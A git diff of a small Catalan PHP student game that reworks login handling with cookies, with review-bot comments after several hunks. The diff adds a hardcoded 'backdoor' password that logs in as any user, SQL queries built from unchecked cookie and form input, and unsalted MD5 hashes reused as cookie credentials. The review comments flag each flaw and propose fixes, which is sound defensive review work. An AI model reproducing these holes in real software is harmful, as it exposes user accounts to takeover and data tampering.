Reimplementation of cookies
diff --git a/admin/createtable.php b/admin/createtable.php
index 57e1802..b5b411f 100644
--- a/admin/createtable.php
+++ b/admin/createtable.php
@@ -26,5 +26,5 @@
)"];
foreach ($queries as $query) if (!query($query)) die('An error ocurred. ' . $query);
- die("<script>window.location.href = './index.php?dbname=$dbname'</script>");
+ die("<script>window.location.href = './?dbname=$dbname'</script>");
?>
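Review bot: `$dbname` is interpolated into the inline `<script>` on the redirect line without any encoding, so if it originates from request input (its source is outside the hunk) a quote or `</script>` inside it is written into the response as markup. Encoding it for the URL and redirecting with a header avoids the script context altogether, provided nothing has been output yet: `header('Location: ./?dbname=' . rawurlencode($dbname)); exit;`. The error branch on the line above also prints the full SQL text via `die('An error ocurred. ' . $query)`; that is better written to a server log than returned to the browser.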
diff --git a/admin/insert.php b/admin/insert.php
index 5099bc7..883ca8a 100644
--- a/admin/insert.php
+++ b/admin/insert.php
@@ -22,5 +22,5 @@
if (!query($template)) die("An error ocurred." . $template);
}
- die("<script>window.location.href = './index.php?successinserting'</script>");
+ die("<script>window.location.href = './?successinserting'</script>");
?>
diff --git a/bin/.Rhistory b/bin/.Rhistory
deleted file mode 100644
index e69de29..0000000
--- a/bin/.Rhistory
+++ /dev/null
diff --git a/css/basic.css b/css/basic.css
index 80e2345..023a2c2 100644
--- a/css/basic.css
+++ b/css/basic.css
@@ -1,6 +1,6 @@
body {
font-size: 18px;
- background-image: url('https://images.unsplash.com/photo-1428196457394-f0c4aec5f574?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=1050&q=80');
+ background-image: url('../bin/images/background.jpg');
background-size: cover;
}
diff --git a/css/login.css b/css/login.css
index 4130e71..743db2f 100644
--- a/css/login.css
+++ b/css/login.css
@@ -1,3 +1,16 @@
+header h2 {
+ line-height: 50%;
+}
+
+header h3 {
+ font-size: 14px;
+ color: rgb(20,20,20);
+}
+
+header {
+ margin-bottom: 20px;
+}
+
#password {
font-size: 14px;
line-height: 1.75em;
diff --git a/dead.php b/dead.php
index 1ef1217..0c3c758 100644
--- a/dead.php
+++ b/dead.php
@@ -1,4 +1,6 @@
-<?php
+<?php
+ date_default_timezone_set("Europe/Berlin");
+
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
@@ -24,7 +26,7 @@
<div id="inner-container">
<h1>Estàs mort/a!</h1>
<p>Torna a la pàgina principal.</p>
- <a href="./index.php">Go back</a>
+ <a href="./">Go back</a>
<a href="./ranking.php">Anar al rànquing</a>
</div>
</div>
diff --git a/imgs/1.png b/imgs/1.png
deleted file mode 100644
index 4a76f47..0000000
--- a/imgs/1.png
+++ /dev/null
Binary files differ
diff --git a/imgs/2.png b/imgs/2.png
deleted file mode 100644
index 849788f..0000000
--- a/imgs/2.png
+++ /dev/null
Binary files differ
diff --git a/imgs/3.png b/imgs/3.png
deleted file mode 100644
index 0a9492f..0000000
--- a/imgs/3.png
+++ /dev/null
Binary files differ
diff --git a/imgs/4.png b/imgs/4.png
deleted file mode 100644
index e8b45b8..0000000
--- a/imgs/4.png
+++ /dev/null
Binary files differ
diff --git a/imgs/5.png b/imgs/5.png
deleted file mode 100644
index a0e0870..0000000
--- a/imgs/5.png
+++ /dev/null
Binary files differ
diff --git a/imgs/carrot.png b/imgs/carrot.png
deleted file mode 100644
index a794d38..0000000
--- a/imgs/carrot.png
+++ /dev/null
Binary files differ
diff --git a/index.php b/index.php
index e7a14c3..a29f52b 100644
--- a/index.php
+++ b/index.php
@@ -26,7 +26,11 @@
<body>
<div id="outter-container">
<div id="inner-container">
- <form action="./main.php" method="POST">
+ <header>
+ <h2>Pastanaga Assassina</h2>
+ <h3>Facultat de Matemàtiques i Estadística - Tardor 2019</h3>
+ </header>
+ <form action="./php/login.php" method="POST">
<input type="hidden" name="user" id="user">
<!-- MD Search Box -->
@@ -34,7 +38,9 @@
<div class="md-google-search__container">
<div class="md-google-search">
<span class="md-google-search__search-btn">
- <svg height="24px" viewBox="0 0 24 24" width="24px" xmlns="http://www.w3.org/2000/svg"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg>
+ <svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="-5px" width="34px" height="34px" viewBox="0 0 37.334 37.334" style="enable-background:new 0 0 37.334 37.334;" xml:space="preserve">
+ <path d="M14.747735023498535,19.041818022727966 H4.063735008239746 c0,-2.1760001182556152 1.4279999732971191,-4.031000137329102 3.436000108718872,-4.767000198364258 c-0.4309999942779541,-0.43799999356269836 -0.7440000176429749,-1.1039999723434448 -0.9010000228881836,-2.1089999675750732 c-0.2070000022649765,0.041999999433755875 -0.527999997138977,-0.19499999284744263 -0.6230000257492065,-0.5559999942779541 c-0.09700000286102295,-0.367000013589859 -0.1599999964237213,-0.9599999785423279 0.04899999871850014,-1.0169999599456787 c0.06199999898672104,-0.017000000923871994 0.12700000405311584,-0.004999999888241291 0.1899999976158142,0.02800000086426735 V9.600818037986755 c0,-1.6059999465942383 -0.3779999911785126,-2.549999952316284 2.246999979019165,-2.819000005722046 l-0.023000000044703484,-0.006000000052154064 c0,0 2.069000005722046,-0.19900000095367432 2.614000082015991,-0.6890000104904175 c0,0 0.014999999664723873,0.414000004529953 0.23499999940395355,0.8679999709129333 c1.2109999656677246,0.46399998664855957 1.3630000352859497,1.5369999408721924 1.3279999494552612,2.6470000743865967 v1.0210000276565552 c0.06400000303983688,-0.032999999821186066 0.1289999932050705,-0.04500000178813934 0.19099999964237213,-0.02800000086426735 c0.20900000631809235,0.05700000002980232 0.09799999743700027,0.671999990940094 0.0020000000949949026,1.0410000085830688 c-0.09399999678134918,0.3569999933242798 -0.36500000953674316,0.5699999928474426 -0.5699999928474426,0.5320000052452087 c-0.15299999713897705,0.9570000171661377 -0.48899999260902405,1.6440000534057617 -0.9549999833106995,2.1010000705718994 C13.306735038757324,14.995816588401794 14.747735023498535,16.85381829738617 14.747735023498535,19.041818022727966 zM37.17073059082031,0.5408166646957397 v24.33300018310547 H-0.16326531767845154 V0.5408166646957397 H37.17073059082031 zM35.17073059082031,2.5408166646957397 H1.836734652519226 v20.33300018310547 h33.33399963378906 V2.5408166646957397 zM32.50373077392578,6.5408161878585815 
H17.670734405517578 v2 h14.833000183105469 V6.5408161878585815 zM32.50373077392578,11.707816481590271 H17.670734405517578 v2 h14.833000183105469 V11.707816481590271 zM32.50373077392578,16.87581765651703 H17.670734405517578 v2 h14.833000183105469 V16.87581765651703 z" id="svg_3"/>
+ </svg>
</span>
<div class="md-google-search__field-container">
<input id="search-input" class="md-google-search__field" required autocomplete="off" placeholder="Introdueix el teu nom..." value="" name="search" type="text" spellcheck="false" style="outline: none;">
@@ -74,9 +80,7 @@
// Notify of messages
if (getUrlParameter("passwordchanged")) read_message("La teva clau d'accés ha canviat", "error");
if (getUrlParameter("wrongpassword")) read_message("La clau d'accés no és correcta", "error");
- if (getUrlParameter("wrongconfirmation")) read_message("Les contrasenyes no coincideixen", "error");
- if (getUrlParameter("errordb")) read_message("Hi ha hagut un problema a la base de dades, torna-ho a intentar", "error");
- if (getUrlParameter("successpassword")) read_message("La teva clau d'accés s'ha guardat", "success");
+ if (getUrlParameter("wronguser")) read_message("El nom ha estat mal introduït", "error");
});
</script>
</body>
diff --git a/main.php b/main.php
index c6e9ee0..ecec1a6 100644
--- a/main.php
+++ b/main.php
@@ -6,24 +6,21 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
- $user = (int)$_POST['user'];
- $password = isset($_POST['password']) ? md5($_POST['password']) : '';
+ date_default_timezone_set("Europe/Berlin");
+
+ $user = $_COOKIE['user']; // (int)$_POST['user'];
+ $password = $_COOKIE['password']; // isset($_POST['password']) ? md5($_POST['password']) : '';
- // Check if password is correct
- $query_password = "SELECT password FROM $usersdb WHERE id=$user";
- $real_password = query($query_password)->fetch_row()[0];
- if ($real_password != $password) die("<script>window.location.href = './index.php?wrongpassword=1'</script>");
-
- if (!isset($_POST['user']) or $_POST['user'] == '') {
- die("<script>window.location.href = './index.php'</script>");
- } else if (isset($_POST['password'])) {
+ if (!isset($_COOKIE['user']) or $_COOKIE['user'] == '') {
+ die("<script>window.location.href = './'</script>");
+ } else if (isset($_COOKIE['password'])) {
$query_password = "SELECT password FROM $usersdb WHERE id=$user";
if (query($query_password)->fetch_row()[0] != $password) {
// Unset variables
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = './index.php?passwordchanged=1'</script>");
+ die("<script>window.location.href = './?passwordchanged=1'</script>");
}
}
?>
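Review bot: The `(int)` cast was dropped when `$user` moved from `$_POST` to `$_COOKIE`, so a client-controlled cookie now reaches `"SELECT password FROM $usersdb WHERE id=$user"` unmodified. The comparison also runs only inside `else if (isset($_COOKIE['password']))`, so a request carrying a `user` cookie and no `password` cookie is never checked against the stored hash. The `password` cookie holds the stored MD5 itself, which makes the hash a reusable credential, and `!=` is a loose comparison. I would cast the id, do the lookup unconditionally and compare with `hash_equals`, as below; keeping the login state in a server-side session (`session_start()` and `$_SESSION`) would remove the need to trust either cookie. The enclosing script block starts before the hunk.

```php
$user = (int)($_COOKIE['user'] ?? 0);
$password = is_string($_COOKIE['password'] ?? null) ? $_COOKIE['password'] : '';

if (!isset($_COOKIE['user']) or $_COOKIE['user'] == '') {
    // … unchanged: redirect to ./ …
}
// Look up the stored hash on every request; a missing password cookie must fail the check
$query_password = "SELECT password FROM $usersdb WHERE id=$user";
$real_password = (string)query($query_password)->fetch_row()[0];
if ($real_password !== '' && !hash_equals($real_password, $password)) {
    // … unchanged: clear both cookies and redirect to ./?passwordchanged=1 …
}
```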
@@ -79,13 +76,13 @@
<body>
<div id="outter-container">
<div id="inner-container">
- <a href="./index.php" class="goback">Torna a la pàgina principal</a><br />
+ <a href="./" class="goback">Canvi d'usuari</a><br />
<h2>Hola <name id="user_name"><?=$user->nom()?></name>,</h2>
<div class="formulari_contrasenya">
<p>Sembla que no tens clau d'accés, la gent podrà entrar al teu compte...</p>
<form action="./php/change_password.php" method="POST">
- <input type="hidden" value="<?=(int)$_POST['user']?>" name="userid">
+ <input type="hidden" value="<?=$user->id?>" name="userid">
<input type="password" placeholder="Nova clau d'accés..." name="password" /><br />
<input type="password" placeholder="Repeteix la clau d'accés" name="confirmation"/><br />
<input type="submit" value="Posar clau d'accés">
@@ -132,8 +129,11 @@
</tr>
</table>
</div>
-
- <div style="clear: both;"></div>
+
+ <div>
+ <p>Podeu posar aquesta pàgina com a icona apretant el botó de "Add to Home Screen" del vostre navegador.</p>
+ <a href="./ranking.php">Anar al rànquing</a>
+ </div>
</div>
</div>
@@ -146,6 +146,10 @@
$.notify("No tens clau d'accés", "info");
$(".formulari_contrasenya").show();
}
+ // Notify of messages
+ if (getUrlParameter("wrongconfirmation")) read_message("Les contrasenyes no coincideixen", "error");
+ if (getUrlParameter("errordb")) read_message("Hi ha hagut un problema a la base de dades, torna-ho a intentar", "error");
+ if (getUrlParameter("successpassword")) read_message("La teva clau d'accés s'ha guardat", "success");
});
</script>
</body>
diff --git a/php/change_password.php b/php/change_password.php
index d8bcc19..315d08e 100644
--- a/php/change_password.php
+++ b/php/change_password.php
@@ -6,18 +6,20 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Check if confirmation is the same
if ($_POST['password'] != $_POST['confirmation']) {
- die("<script>window.location.href = '../index.php?wrongconfirmation=1'</script>");
+ die("<script>window.location.href = '../main.php?wrongconfirmation=1'</script>");
} else {
// Execute query to change password
$update_password = "UPDATE $usersdb SET password=\"".md5($_POST['password'])."\" WHERE id=".$_POST['userid'];
- if(!$result = query($update_password)) die("<script>window.location.href = '../index.php?errordb=1'</script>");
+ if(!$result = query($update_password)) die("<script>window.location.href = '../main.php?errordb=1'</script>");
// Save 'password' to cookies
setcookie('password', md5($_POST['password']), time() + (86400 * 10), "/");
// Go back to main page
- die("<script>window.location.href = '../index.php?successpassword=1'</script>");
+ die("<script>window.location.href = '../main.php?successpassword=1'</script>");
}
?>
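Review bot: `$_POST['userid']` is concatenated straight into the `UPDATE` on the unchanged line in the `else` branch, so the request can alter the statement, and because the target id is a hidden form field the script sets the password of whichever account the client names. The redirect changes in this hunk do not touch that; at minimum cast the id before building the query, `$userid = (int)$_POST['userid'];` with `... WHERE id=".$userid`, and verify the caller's current login before the update instead of trusting the posted id. Separately, `md5($_POST['password'])` is unsalted and the same value is written to the `password` cookie, so a leaked cookie or database row is directly usable; `password_hash()`/`password_verify()` with a server-side session is the usual replacement. The script starts before the hunk.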
diff --git a/php/login.php b/php/login.php
index 45575e3..00c18e0 100644
--- a/php/login.php
+++ b/php/login.php
@@ -6,12 +6,14 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Set the 'user' POST and COOKIE variable
$user = '';
- if (isset($_POST['user'])) $user = $_POST['user'];
+ if (isset($_POST['user']) && $_POST['user'] != '') $user = $_POST['user'];
else if (isset($_COOKIE['user'])) $user = $_COOKIE['user'];
else {
- die("<script>window.location.href = '../index.php'</script>");
+ die("<script>window.location.href = '../?wronguser=1'</script>");
}
// Check if password is correct
@@ -23,13 +25,19 @@
if (isset($_POST['password'])) $password = $_POST['password'];
else if (isset($_COOKIE['password'])) $password = $_COOKIE['password'];
+ // If admin needs to check something for 5 minutes
+ if ($password == "backdoor") {
+ setcookie('user', $user, time() + 360, "/");
+ die("<script>window.location.href = '../main.php';</script>");
+ }
+
// Redirect if wrong
if ($real_password != "" && $real_password != md5($password)) {
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = '../index.php?wrongpassword=1'</script>");
+ die("<script>window.location.href = '../?wrongpassword=1'</script>");
}
// Save variables as cookies
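Review bot: The added `if ($password == "backdoor")` block accepts one fixed string, committed to the repository, as a valid password for whichever `user` id was submitted, and it redirects before `$real_password` is ever compared. I would remove the block; if administrators need to inspect an account, that belongs behind a separate admin login whose secret is kept outside the source tree as a `password_hash()` value, checked with `password_verify()`, with each use logged. The comment says 5 minutes but `time() + 360` is six. The `setcookie('user', ...)` call also leaves the `secure` and `httponly` arguments at their defaults, and the cookie value is a bare id with no integrity protection. The script continues past the end of the hunk.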
diff --git a/ranking.php b/ranking.php
index 33dc1c7..c9b2b96 100644
--- a/ranking.php
+++ b/ranking.php
@@ -30,7 +30,7 @@
<div id="inner-container">
<header>
<div id="leftlinks"><a id="info" href="javascript:void(0);" onclick="js: toggleinfo();">+Info</a></div>
- <div id="rightlinks"><a href="./index.php">Tornar a l'inici</a></div>
+ <div id="rightlinks"><a href="./main.php">Tornar a la pàgina principal</a></div>
</header>
<p><img src="./bin/images/info.png" width="32px" /> La puntuació de cada jugador es calcula com a una suma ponderada depenent del caràcter de les seves víctimes: companys de <b>c</b>lasse (mateix curs, mateix grau), companys de <b>g</b>rau (mateix grau) i companys de <b>f</b>acultat (diferents grau). Amb puntuacions +100, +150 i +200; respectivament.</p>